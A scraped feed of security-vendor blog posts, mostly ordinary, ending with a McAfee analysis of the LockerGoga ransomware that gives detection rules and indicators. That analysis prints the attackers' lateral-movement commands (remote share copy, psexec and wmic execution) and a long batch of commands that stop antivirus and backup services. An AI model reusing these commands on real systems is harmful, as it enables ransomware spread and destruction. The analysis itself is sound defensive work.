And since I mentioned historical malware, I should mention ‘The Art of Computer Virus Research and Defense ’ (Addison-Wesley), by the much-missed researcher Peter Szor. It came out in 2005, so it’s not, of course, up to date, but it contains a great deal of information about early malware and detection technology. There are, in fact, a few books that cover the history of viruses and anti-virus technology accurately and in detail, but they’re not generally available now. For instance, Robert Slade’s Guide to Computer Viruses (and I won’t mention the book Rob and I wrote together a little later.)

Conclusion

The listed books here cover almost every aspect of cybersecurity, across all levels of skill. From the highly technical to the easy, literary reads anyone can enjoy. Hopefully, one or more of these books will help you out in becoming hack proof.

What book would you add to the list? Submit your proposals in the comments below.

The easy way to protect yourself against malware
Here's 1 month of Thor Foresight Home, on the house!
Use it to: Block malicious websites and servers from infecting your PC Auto-update your software and close security gaps Keep your financial and other confidential details safe

EASY AND RELIABLE. WORKS WITH ANY ANTIVIRUS.

Try Thor Foresight

The post The best cyber security books out there, chosen by over 20 experts appeared first on Heimdal Security Blog.

Survey reveals just how bad the UK is at creating passwords

There are more than 171,000 words in the English language, and yet millions of us can’t look beyond the word that’s right in front of us when selecting a password.

Yes, the NCSC (National Cyber Security Centre)’s Cyber Security Survey found that 3.6 million Britons use ‘password’ as their password. Just as bad are the 23.2 million who use ‘123456’ and the 3.8 million who use ‘qwerty’.

Other common passwords include people’s names (‘ashley’, ‘michael’, ‘daniel’, ‘jessica’ and ‘charlie’ were the most used), football teams and, bizarrely, the pop punk act ‘blink-182’.

But rather than simply castigate the British public for their ineptitude when selecting login credentials, the NCSC provides some much-needed advice on how we can better secure our accounts.

How to make your passwords stronger

When creating passwords, many experts advise using a combination of letters, numbers and special characters (which might explain the interest in Blink-182). However, the NCSC suggests that we might be better off with a combination of three random words.

The reason for this is simple. Despite the requirement for a mix of characters, most systems only require that passwords be six characters long. This might seem to be more than enough – a combination of 26 letters, 10 numerals and 33 special characters gives you 107 billion possible permutations – but reality rarely plays out this way.

For example, the number ‘1’ appears far more often than any other letter, and the special character (for there is typically only one) is almost always ‘-‘. Most of us have therefore given crooks a decent shot at two characters in your password – and they’ll typically be the last two characters.

If you try to outsmart crooks by gorging yourself on special characters, using passwords like ‘a3g^%s’, you’ve only made life harder for yourself. The password is almost impossible to memorise, and criminal hackers are aware of common substitutions, factoring them in when trying to access accounts.

However, as the NCSC advises, you can make your password much stronger simply by making it longer. Each additional letter you use makes your password 26 times harder to crack, meaning a ten-character password that uses letters alone has 141 trillion combinations.

To put it another way, How Secure Is My Password? predicts that the seemingly complex phrase ‘a3g^%s’ could be cracked in 400 milliseconds, whereas a ten-letter combination of three words, like ‘hardtocrack’, would take about a day.

That’s a decent result, but with the number of crooks in the wild churning through passwords, you can do better. Make your password a little longer, like ‘typingmypassword’, and you have a phrase that could take 35,000 years to crack – and that’s with the concession of making your password a literal description of itself.

Anyone capable of conjuring up three genuinely random words could create a password that would take trillions of years to crack without having to compromise on memorability.

Subscribe to the GRC Weekly for all the latest cyber security news and advice >>

The post Survey reveals just how bad the UK is at creating passwords appeared first on IT Governance Blog.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What is Rubber Stamping and Why is it a Serious Cybersecurity Concern?

Although it is not common practice these days to use the red “APPROVED” physical ink stamp, the act of bulk approving (or denying) requests without the necessary time invested or research conducted is as popular as ever. Though this can occur in any department across any organization, this practice of rubber-stamping is particularly problematic when related to the review of access to IT resources. Bulk approvals of requests to have access to any of the various systems and assets quickly becomes a security concern. In order to avoid giving into the temptation to rush approvals of these requests without adequate review, organizations must first understand the damage that can result from overusing approvals, why it happens, and how this can be prevented.

The Dangers of Too Much Access

User access and how it is managed greatly impacts the risk of insider threats, which have become all too common. In fact, according to a survey completed by Cybersecurity Insiders, over 50 percent of organizations surveyed experienced an insider attack in the last twelve months. Approving everyone for any access they apply for, or not adequately reviewing user access periodically, provides ample opportunity for both malicious and accidental insider threats.

Dissatisfied employees pose a unique risk given their knowledge of the organization and their sometimes nefarious motivations. If they know the approval process is not being monitored or access is not being periodically reviewed, they could easily submit a request to access sensitive data which they could then misuse. It could take months before their activity was discovered.

Accidental or negligent misuse of access is also considered an insider threat. Employees may not understand exactly what access they need and end up asking for and being approved for more privilege than they require; they may even request access to the wrong system or asset entirely. The result is often errors in how the access is used. Failing to govern exactly who is asking for what and why they need it creates an environment primed for increased errors.

Additionally, limiting user access is a key component of many regulations like GDPR, Sarbanes Oxley (SOX), and HIPAA, whether it be through the application of proper approval processes or the periodic review of access. Frequent rubber stamping could result in being out of compliance, opening your organization up to potential fines, or worse.

Certification Fatigue and Information Underload: Why Rubber Stamping Occurs

Approving entitlements without a second glance is dangerous. So why is it so common?

Firstly, those in charge of approving access requests or periodically reviewing large lists of user entitlements are often inundated with them, causing certification fatigue. In order to get through the list and get back to work, they simply grant them all. Essentially, they may be busy enough that the only type of access review or approval that will happen in a timely manner is a careless one.

Secondly, access reviews especially are often presented in a confusing format, or an unreadable one. Spreadsheets with this information are hard to read and may not provide enough context to determine if the existing access is actually needed. There are several considerations which may not be listed in a spreadsheet, like how commonly the type of access requested is granted for a given job role, or if it is only needed for a limited time or purpose. With potentially hundreds of requests in need of action, it’s impractical to expect a reviewer or approver to take the time to research each request.

Ultimately, these kinds of reviews require a human eye and a clear understanding of the context in which the access is requested or has been granted. A balance must be struck between efficiency, accuracy, and security. As long as this process is manual, without improvements in the manner which the data are presented to the user, accuracy is a difficult goal to achieve.

Providing Access Accurately and Safely with a Certification Solution

Core Certify provides the context approvers need to make an informed decision in a visual format that allows users to clearly and quickly see common user entitlements and rapidly identify outliers. Core Certify works as a standalone solution, or as part of a suite that enables an organization to also take a graphic approach to periodic or ad-hoc access reviews.

In addition, the same visual, context-driven approach is available for role creation. To see it for yourself, as well as the rest of the Visual Identity Suite, get a personalized demo today.

rubber-stamp.png

Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs

How Veracode Security Program Managers Benefit Your AppSec Program

The application security space is a complicated environment with a vast landscape of roles, development methodologies, and tech stacks. Developers, security leads, risk analysts, Scrum masters, vendor managers, operations teams, and system architects are all on the scene, just to name a few. 

If we compare the land of AppSec to the agriculture industry, your Veracode Security Program Managers are the farmers, and secure software is our crop. Our calloused hands are dirty with application security, and we thrive on lending our green thumb to your program, so you can achieve your security and organizational goals. 

This summer marks my two-year tenure as a Veracode Security Program Manager. I support about 30 different customer organizations in the Eastern US, and I specialize in scaling new application security initiatives into best-in-class programs. We are all about delivering value here at Veracode, and I wanted to shed some light on how Security Program Managers can help guide you on your AppSec journey.

We’re Here For You

Whether you need us for one hour per month, or 16 hours a week, we’ve got your back. We are a part of the larger Services team within Veracode, and we’re proud of it. Some of us support 250 customers, some of us support three customers, and most of us are somewhere in between. Regardless of your level of service, you will always be partnered with a Veracode Security Manager to help you succeed.

As Security Program Managers, most of our time is spent communicating with our customers. Although Veracode may be one tool in your program, we understand how the solution fits into your larger security landscape, and we are experts in the space. Internally, we share what works (and what doesn’t work) with each other to fine tune our best-practice methods.   

We’re an Extension of Your Team

Although we are process and workflow wizards, there may be times when we don’t have the answer to your questions right away. However, we usually know who will. Veracode Security Program Managers act on your behalf as corporate liaisons, and we’re not shy about asking for help when we don’t know something.           

Throughout the life of your program, you’ll work with us to identify organizational challenges, program goals, and success metrics. The combination of these tools and our programmatic approach holds you and your team accountable. Need help integrating Veracode results into your SIEM or want to discuss the best way to manage your CI/CD pipeline? We know some people.   

We Help You Achieve Security as a Competitive Advantage

Kick-off calls, platform demos, status calls, and program review meetings equip us with visibility into the health of your program. These touchpoints, combined with a blend of analytics, strategic expertise, and a shared passion for efficiency, are the base to our secret sauce for your success. We’re obsessed with helping you lessen your risk of failure and saving you money, all while enabling your organization to become more secure as a competitive advantage.

Your Veracode Security Program Manager will have insight into our newest programs and resources to help you achieve your security goals. Lean on us to help you discover a list of your applications that already qualify for the free Veracode Verified program. We’ll also keep you up to speed on our latest and greatest free webinars, which are released on a monthly basis. Becoming familiar with your program enables us to send you content tailored to your initiatives. Let us dig through the noise and send you the right resources.

We Evolve With You

The pressure to produce more code more quickly will only compound over time. Veracode Security Program Managers are here to ensure your great software is also secure, all while helping you move fast. While speed is top of mind for us, accuracy is built into our DNA. As a team, we are passionate about staying ahead of emerging market changes and the latest technology trends.   

We know how to leverage our enhanced Veracode Analytics tool in the platform to gain immediate insight into your program to identify potential risk, areas to improve, and strategic next steps. We can also help you learn how to create and share custom reports that are meaningful to both you and your business. 

Your organization is working hard to create software that’s changing the world; lean on a Veracode Security Program Manager as a trusted advisor to help secure it. Together, we can plant the seeds for bold innovations and pioneer new discoveries.     

Check out our website, to learn more about our Services organization.

Cyber Ranges: Extending the Skills of Tool Experts

Working with rapidly growing products like our CMD+CTRL Cyber Range is fun for a variety of reasons, particularly because seeing people smile while learning is a rare occurrence. For much of the Security Innovation team though, the best experience is growing a technology from an interesting idea to a rapidly maturing product. Even better, the journey allows for many “Aha!” moments in the form of feedback and ideas from our customers.

LockerGoga Ransomware Family Used in Targeted Attacks

Initial discovery

Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims’ files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.

In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.

Technical analysis

LockerGoga is a ransomware that exhibits some interesting behaviors we want to highlight. Based on our research, and compared with other families, it has a few unique functions and capabilities that are rare compared to other ransomware families that have similar objectives and/or targeted sectors in their campaigns.

In order to uncover its capabilities, we analyzed all the samples we found, discovering similarities between them, as well as how the development lifecycle adds or modifies different features in the code to evolve the ransomware in a more professional tool used by the group behind it.

One of the main differences between LockerGoga and other ransomware families is the ability to spawn different processes in order to accelerate the file encryption in the system:

Like other types of malware, LockerGoga will use all the available CPU resources in the system, as we discovered on our machines:

Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.

The ransomware needs be executed from a privileged account.

LockerGoga works in a master/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself on the %TEMP% folder.

After being copied, it will start a new process with the -m parameter.

The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.

The slave processes will be executed with a different set of parameters as shown below. Each slave process will encrypt only a small number of files, to avoid heuristic detections available in endpoint security products. The list of files to encrypt is taken from the master process via IPC, an interface used to share data between applications in Microsoft Windows. The communication is done through IPC using a mapped section named SM-<name of binary>.

Here is the IPC technique used by LockerGoga:

  • The master process (run as <LockerGogaBinary> -m) creates a named section on the system for IPC.
  • The section is named “SM-tgytutrc”.
  • The master ransomware process posts the filepath of the file to be encrypted to the named section “SM-tgytutrc”.
  • This section is used by the slave processes to pick up the filepath and encrypt the target file.

Sandbox replication of master process screenshot below showing:

  • Creation of the named section.
  • Subsequent creation of slave processes to encrypt target files on the endpoint.

Sandbox replication of slave process (encryption process) below showing:

  • Obtaining access to the section created by the master process.
  • Reading and encryption of a target file found based on the filepath specified in the named section.

The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.

Instead, we suspect this approach is adopted for the following reasons:

  • Footprint: If every encryption process encrypts only a small number of files on the endpoint and terminates, then the overall footprint of the attack on the system decreases since it may be difficult to co-relate multiple encryption processes to the same threat.
  • Sandbox Bypass: Some sandbox-based detection systems monitor the threshold of the number of files written on the system and may co-relate it to the file extensions being written to. E.g. If a process reads, say, 200 files on the sandbox but only creates files with one specific extension (typical of ransomware – Extn “.locked” in the case of LockerGoga) then this can be considered anomalous behavior. LockerGoga may be able to bypass such detection techniques.
  • File I/O based detection bypass: A multi-process-based approach makes sure that the amount of I/O (File/Disk I/O etc.) for each encryption process is within a certain limit, thus bypassing detection techniques that monitor exorbitant I/O based detection.
  • Reliability: Even if one encryption process is manually terminated by an end-user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware process does not use the multi-process approach, then terminating the ransomware process stops the encryption on the endpoint.

Username Administrator:

Username Tinba:

The author implemented a logging function that can be enabled if you callout the sample in execution using the parameter “-l” to store all the results in a file called ‘log.txt’ in the root C drive:

During execution we enabled the log function and saw how the ransomware encrypts the system, causing high CPU usage and opening the ransom note during the process. This is the aspect in an infected system:

As we executed the sample with the log function, we could access this file to check the status of the encryption. Obviously, this most likely a debug function used by the developer.

In order to know how the ransomware works, and with the help of the log function enabled, we could establish the order of LockerGoga to encrypt the system:

  • Log file creation in the C: drive
  • Folder and file enumeration
  • File encryption & ransom note creation in the desktop folder.

One interesting thing to mention is that, before encrypting any file in the system, the malware will search for files in the trashcan folder as the first option. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:

LockerGoga will start to enumerate all the folders and files in the system to start the encryption process. This enumeration is done in parallel, so we can expect the process wouldn’t take much time.

After the enumeration the ransomware will create the ransom note for the victim:

The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:

Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check https://www.nomoreransom.org

Below is an example of the ransom note content on an infected machine:

Greetings!

There was a significant flaw in the security system of your company.

You should be thankful that the flaw was exploited by serious people and not some rookies.

They would have damaged all of your data by mistake or for fun.

 

Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.

Without our special decoder it is impossible to restore the data.

Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.

will lead to irreversible destruction of your data.

 

To confirm our honest intentions.

Send us 2-3 different random files and you will get them decrypted.

It can be from different computers on your network to be sure that our decoder decrypts everything.

Sample files we unlock for free (files should not be related to any kind of backups).

 

We exclusively have decryption software for your situation

 

DO NOT RESET OR SHUTDOWN – files may be damaged.

DO NOT RENAME the encrypted files.

DO NOT MOVE the encrypted files.

This may lead to the impossibility of recovery of the certain files.

 

The payment has to be made in Bitcoins.

The final price depends on how fast you contact us.

As soon as we receive the payment you will get the decryption tool and

instructions on how to improve your systems security

 

To get information on the price of the decoder contact us at:

In parallel of the ransom note creation, the files will start to be encrypted by LockerGoga with the .locked extension appended to all files. This extension has been broadly used by other ransomware families in the past:

LockerGoga has embedded in the code the file extensions that it will encrypt. Below is an example:

The sample has also configured some locations and files that will be skipped in the encryption process so as not to disrupt the Operating System from running.

All the files encrypted by this ransomware will have a specific FileMarker inside:

Note: The FileMarker identifies the ransomware family and the most likely version; in this case it is 1440.

During the investigation we identified the following versions:

  • 1200
  • 1510
  • 1440
  • 1320

Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets/campaigns.

After encrypting, LockerGoga executes ‘cipher.exe’ to remove the free space to prevent file recovery in the infected system. When files are deleted on a system, sometimes they are still available in the free space of a hard disk and can theoretically be recovered.

Samples digitally signed:

During our triage phase we found that some of the LockerGoga samples are digitally signed. We are observing from ATR that the latest ransomware pieces used a lower scale and more focused are released digitally signed:

  • MIKL LIMITED
  • ALISA LTD
  • KITTY’S LTD

Digitally signing the malware could help the attackers to bypass some of the security protections in the system.

As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:

MX-[a-z]\w+

Examples of mutex found:

MX-imtvknqq

MX-tgytutrc

MX-zzbdrimp

Interesting strings found

In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:

  • LockerGoga
  • crypto-locker
  • goga
E:\\crypto-locker\\cryptopp\\src\\crc_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\rijndael_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sha_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sse_simd.cpp

E:\\goga\\cryptopp\\src\\crc_simd.cpp

E:\\goga\\cryptopp\\src\\rijndael_simd.cpp

E:\\goga\\cryptopp\\src\\sha_simd.cpp

E:\\goga\\cryptopp\\src\\sse_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\crc_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\rijndael_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sha_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sse_simd.cpp

The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.

Spreading methods:

The malware is known to be spread in the local network through remote file copy. To do that, a set of .batch files are copied to the remote machines TEMP folder using simple copy:

  • copy xax.bat \\123.123.123.123\c$\windows\temp

The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the malware will run the .BAT file using the following command:

  • start psexec.exe \\123.123.123.123 -u domain\user -p “pass” -d -h -r mstdc -s accepteula -nobanner c:\windows\temp\xax.bat

Each of these .BAT files contain lines to execute the malware on remote machines. They use the following command:

  • start wmic /node:”123.123.123.123″ /user:”domain\user” /password:”pass” process call create “cmd /c c:\windows\temp\kill.bat”

The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from

c:\windows\temp\taskhost.exe.

Due to the presence of these batch files and the fact that the malware binary makes no direct reference to them, we believe that the spreading mechanism is executed manually by an attacker or via an unknown binary. The path, username, and passwords are hardcoded in the scripts which indicate the attacker had previous knowledge of the environment.

The following is a list of all the processes and services disabled by the malware:

One batch file found in the infected systems where LockerGoga was executed will stop services and processes regarding critical services in the system and security software:

net stop BackupExecAgentAccelerator /y net stop McAfeeEngineService /y
net stop BackupExecAgentBrowser /y net stop McAfeeFramework /y
net stop BackupExecDeviceMediaService /y net stop McAfeeFrameworkMcAfeeFramework /y
net stop BackupExecJobEngine /y net stop McTaskManager /y
net stop BackupExecManagementService /y net stop mfemms /y
net stop BackupExecRPCService /y net stop mfevtp /y
net stop BackupExecVSSProvider /y net stop MMS /y
net stop bedbg /y net stop mozyprobackup /y
net stop DCAgent /y net stop MsDtsServer /y
net stop EPSecurityService /y net stop MsDtsServer100 /y
net stop EPUpdateService /y net stop MsDtsServer110 /y
net stop EraserSvc11710 /y net stop MSExchangeES /y
net stop EsgShKernel /y net stop MSExchangeIS /y
net stop FA_Scheduler /y net stop MSExchangeMGMT /y
net stop IISAdmin /y net stop MSExchangeMTA /y
net stop IMAP4Svc /y net stop MSExchangeSA /y
net stop macmnsvc /y net stop MSExchangeSRS /y
net stop masvc /y net stop MSOLAP$SQL_2008 /y
net stop MBAMService /y net stop MSOLAP$SYSTEM_BGC /y
net stop MBEndpointAgent /y net stop MSOLAP$TPS /y
net stop McShield /y net stop MSSQLFDLauncher$TPS /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPSAMA /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLSERVER /y
net stop MSSQL$ECWDB2 /y net stop MSSQLServerADHelper100 /y
net stop MSSQL$PRACTICEMGT /y net stop MSSQLServerOLAPService /y
net stop MSSQL$PRACTTICEBGC /y net stop MySQL57 /y
net stop MSSQL$PROFXENGAGEMENT /y net stop ntrtscan /y
net stop MSSQL$SBSMONITORING /y net stop OracleClientCache80 /y
net stop MSSQL$SHAREPOINT /y net stop PDVFSService /y
net stop MSSQL$SQL_2008 /y net stop POP3Svc /y
net stop MSSQL$SYSTEM_BGC /y net stop ReportServer /y
net stop MSSQL$TPS /y net stop ReportServer$SQL_2008 /y
net stop MSSQL$TPSAMA /y net stop ReportServer$SYSTEM_BGC /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop ReportServer$TPS /y
net stop MSSQL$VEEAMSQL2012 /y net stop ReportServer$TPSAMA /y
net stop MSSQLFDLauncher /y net stop RESvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y net stop sacsvr /y
net stop MSSQLFDLauncher$SBSMONITORING /y net stop MSSQLFDLauncher$SHAREPOINT /y net stop SamSs /y
net stop MSSQLFDLauncher$SQL_2008 /y net stop SAVAdminService /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y net stop SAVService /y
net stop MSOLAP$TPSAMA /y net stop MSSQLFDLauncher$TPS /y
net stop MSSQL$BKUPEXEC /y net stop MSSQLFDLauncher$TPSAMA /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop Smcinst /y net stop SQLTELEMETRY$ECWDB2 /y
net stop SmcService /y net stop SQLWriter /y
net stop SMTPSvc /y net stop SstpSvc /y
net stop SNAC /y net stop svcGenericHost /y
net stop SntpService /y net stop swi_filter /y
net stop sophossps /y net stop swi_service /y
net stop SQLAgent$BKUPEXEC /y net stop swi_update_64 /y
net stop SQLAgent$ECWDB2 /y net stop TmCCSF /y
net stop SQLAgent$PRACTTICEBGC /y net stop tmlisten /y
net stop SQLAgent$PRACTTICEMGT /y net stop TrueKey /y
net stop SQLAgent$PROFXENGAGEMENT /y net stop TrueKeyScheduler /y
net stop SQLAgent$SBSMONITORING /y net stop TrueKeyServiceHelper /y
net stop SQLAgent$SHAREPOINT /y net stop SQLAgent$SQL_2008 /y net stop UI0Detect /y
net stop SQLAgent$SYSTEM_BGC /y net stop SQLAgent$TPS /y net stop VeeamBackupSvc /y
net stop SQLAgent$TPSAMA /y net stop VeeamBrokerSvc /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop SQLAgent$VEEAMSQL2012 /y net stop VeeamCatalogSvc /y
net stop SQLBrowser /y net stop VeeamCloudSvc /y
net stop SDRSVC /y net stop SQLSafeOLRService /y
net stop SepMasterService /y net stop SQLSERVERAGENT /y
net stop ShMonitor /y net stop SQLTELEMETRY /y
net stop VeeamDeploymentService /y net stop NetMsmqActivator /y
net stop VeeamDeploySvc /y net stop EhttpSrv /y
net stop VeeamEnterpriseManagerSvc /y net stop ekrn /y
net stop VeeamMountSvc /y net stop ESHASRV /y
net stop VeeamNFSSvc /y net stop MSSQL$SOPHOS /y
net stop VeeamRESTSvc /y net stop SQLAgent$SOPHOS /y
net stop VeeamTransportSvc /y net stop AVP /y
net stop W3Svc /y net stop klnagent /y
net stop wbengine /y net stop MSSQL$SQLEXPRESS /y
net stop WRSVC /y net stop SQLAgent$SQLEXPRESS /y net stop wbengine /y
net stop MSSQL$VEEAMSQL2008R2 /y net stop kavfsslp /y
net stop SQLAgent$VEEAMSQL2008R2 /y net stop VeeamHvIntegrationSvc /y net stop KAVFSGT /y
net stop swi_update /y net stop KAVFS /y
net stop SQLAgent$CXDB /y net stop mfefire /y
net stop SQLAgent$CITRIX_METAFRAME /y net stop “SQL Backups” /y net stop “avast! Antivirus” /y
net stop MSSQL$PROD /y net stop aswBcc /y
net stop “Zoolz 2 Service” /y net stop “Avast Business Console Client Antivirus Service” /y
net stop MSSQLServerADHelper /y net stop mfewc /y
net stop SQLAgent$PROD /y net stop Telemetryserver /y
net stop msftesql$PROD /y net stop WdNisSvc /y
net stop WinDefend /y net stop EPUpdateService /y
net stop MCAFEETOMCATSRV530 /y net stop TmPfw /y
net stop MCAFEEEVENTPARSERSRV /y net stop SentinelAgent /y
net stop MSSQLFDLauncher$ITRIS /y net stop SentinelHelperService /y
net stop MSSQL$EPOSERVER /y net stop LogProcessorService /y
net stop MSSQL$ITRIS /y net stop EPUpdateService /y
net stop SQLAgent$EPOSERVER /y net stop TmPfw /y
net stop SQLAgent$ITRIS /y net stop SentinelAgent /y
net stop SQLTELEMETRY$ITRIS /y net stop SentinelHelperService /y
net stop MsDtsServer130 /y net stop LogProcessorService /y
net stop SSISTELEMETRY130 /y net stop EPUpdateService /y
net stop MSSQLLaunchpad$ITRIS /y net stop TmPfw /y
net stop BITS /y net stop SentinelAgent /y
net stop BrokerInfrastructure /y net stop EPProtectedService /y
net stop epag /y net stop epredline /y
net stop EPIntegrationService /y net stop EPSecurityService /y

New ransomware, new features, but still room to improve

We will continue tracking LockerGoga, but we have already seen some interesting features never seen before, such as parallel tasking encrypting the system or log files for debugger purposes. We did not see any spreading method used to deliver LockerGoga so it would be fair to assume it is used in targeted campaigns after the attackers had access to the system. At the time of this analysis, all the samples are not packed, or have complex methods of protection from being executed inside a sandbox system, though this could change in the near future.

Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and also ciphering itself during the process, causing a crash:

We expect all these errors will be fixed with further development of the malware.

Observations:

The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.

In the case of LockerGoga we can observe the following in:

  • Sectigo as a certificate, also used to digitally sign the certificate
  • Ransom note slightly modified from Ryuk Ransomware
  • Specific FileMarker used to flag the encrypted files
  • No BTC address used in the ransom note, meaning victims must make contact directly by email, something that we have seen elsewhere in our latest investigations.

MITRE ATT&CK Coverage:

Hooking

Kernel Modules and Extensions

Process Injection

Code Signing

Query Registry

Process Discovery

Data Compressed

McAfee coverage:

Detection names: 

RansomCLock-FAL!A5BC1F94E750

Ransom-Goga!E11502659F6B

Trojan-Ransom

Ransom-Goga!438EBEC995AD

Trojan-FQSS!3B200C8173A9

RansomCLock-FAL!A1D732AA27E1

Ransom-Goga!C2DA604A2A46

Ransom-O

Trojan-FPYT!BA53D8910EC3

Ransom-FQPT!FAF4DE4E1C5D

RansomCLock-FAL!3EBCA21B1D4E

RansomCLock-FAL!E8C7C902BCB2

Ransom-Goga!E11502659F6B

Generic.bvg

Ransom-Goga!16BCC3B7F32C

Expert Rules

The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:

Rule {

Process {

Include OBJECT_NAME { -v “SYSTEM:REMOTE” }

}

Target {

Match FILE {

Include OBJECT_NAME { -v “c:\\windows\\temp\\*.exe” }

Include OBJECT_NAME { -v “c:\\windows\\temp\\*.bat” }

Include -access “CREATE”

}

}

}

Rule {

Process {

Include OBJECT_NAME { -v “WmiPrvSE.exe” }

}

Target {

Match PROCESS {

Include OBJECT_NAME { -v “cmd.exe”}

Include -access “CREATE”

}

}

}

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

Prescriptive guidance

It is advisable for customers to undertake appropriate risk assessment to determine if this threat has a high probability of targeting their environments.  Whilst the above detailed known samples are incorporated within McAfee technologies, customers can also add the following Access Protection rules to prevent the creation of encrypted files on the victim host:

Executables:

  • Inclusion Status: Include
  • File Name or Path: *
  • SubRule:

SubRule:

  • Type: File
  • Operations: Create
  • Targets:
    • Target 1:
      • Include
      • Files: *.locked
    • Target 2:
      • Include
      • Destination file: *.locked

Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:

  • File/Folder Access Protection Rule: Processes tInclude: *
  • File or folder name tblock: *.locked
  • File actions tprevent: New files being create

Access Protection Rules:

Customers can also add Access Protection rules matching these characteristics: Prevent Creation\Execution of:

  • c:\windows\temp\x??.bat
  • c:\windows\temp\kill.bat
  • c:\windows\temp\taskhost.exe

Prevent execution of binaries signed with SN:

  • C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell,
  • O=MIKL LIMITED, CN=MIKL LIMITED
  • C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent
  • Garden, O=ALISA LTD, CN=ALISA LTD
  • C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road,
  • O=KITTY’S LTD, CN=KITTY’S LTD

YARA RULE

We have a YARA rule available on our ATR github repository:

IOCs

a52f26575556d3c4eccd3b51265cb4e6

ba53d8910ec3e46864c3c86ebd628796

c2da604a2a469b1075e20c5a52ad3317

7e3f8b6b7ac0565bfcbf0a1e3e6fcfbc

3b200c8173a92c94441cb062d38012f6

438ebec995ad8e05a0cea2e409bfd488

16bcc3b7f32c41e7c7222bf37fe39fe6

e11502659f6b5c5bd9f78f534bc38fea

9cad8641ac79688e09c5fa350aef2094

164f72dfb729ca1e15f99d456b7cf811

52340664fe59e030790c48b66924b5bd

174e3d9c7b0380dd7576187c715c4681

3ebca21b1d4e2f482b3eda6634e89211

a1d732aa27e1ca2ae45a189451419ed5

e8c7c902bcb2191630e10a80ddf9d5de

4da135516f3da1c6ca04d17f83b99e65

